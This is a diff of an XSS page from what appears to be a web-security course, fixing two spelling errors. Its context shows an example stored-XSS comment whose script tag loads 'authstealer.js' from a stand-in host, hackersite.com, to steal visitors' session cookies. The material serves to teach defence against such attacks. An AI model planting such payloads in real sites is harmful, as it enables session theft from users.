pvcraven/2017_web_security/source/xss/xss.rst

 * Stored XSS Example: An attacker figures out that the comment section of a website can store HTML tags.
 They leave a comment that says:
 "Great price for a great item!
 Read my review here <script src="http://hackersite.com/authstealer.js"> </script>" [xss-attacks]_
-This is a stored in the website, and everytime someone visits the page, they have their session cookies stolen
+This is a stored in the website, and every time someone visits the page, they have their session cookies stolen

-	* Harder for hackers to attempt, because they must find a highly trafficed site that also has a security hole. [xss-prevention]_
+	* Harder for hackers to attempt, because they must find a highly trafficked site that also has a security hole. [xss-prevention]_